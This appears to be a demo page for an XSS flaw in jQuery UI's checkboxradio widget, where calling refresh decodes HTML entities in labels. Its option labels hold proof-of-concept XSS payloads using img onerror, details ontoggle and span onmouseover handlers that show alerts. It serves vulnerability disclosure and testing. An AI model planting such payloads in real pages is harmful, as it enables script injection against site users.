jQuery UI Checkboxradio Widget Refresh Vulnerability Demo

⚠️ Security Vulnerability Demonstration

Issue: When a checkboxradio widget is initialized on an input within a label, calling .checkboxradio("refresh") causes HTML entities in the label to be erroneously decoded, potentially leading to XSS vulnerabilities.

Affected: jQuery UI checkboxradio widget when used with encoded HTML entities in labels.

Select your preferred security research areas:

Web Application Security (Safe)

Network Security Research <img src=x onerror="console.log('XSS via widget refresh!'); alert('Network Security XSS executed!');">

Mobile Security <details ontoggle="alert('Mobile Security XSS executed!'); console.log('Mobile XSS via details ontoggle!')" open><summary></summary></details>

Cloud Security <span onmouseover="alert('Hover XSS executed!'); console.log('Cloud Security XSS via mouseover!')" style="text-decoration:underline; cursor:pointer;">[Hover to trigger]</span>

jQuery UI Widget Vulnerability Demo

⚠️ Security Vulnerability Demonstration

Select your preferred security research areas: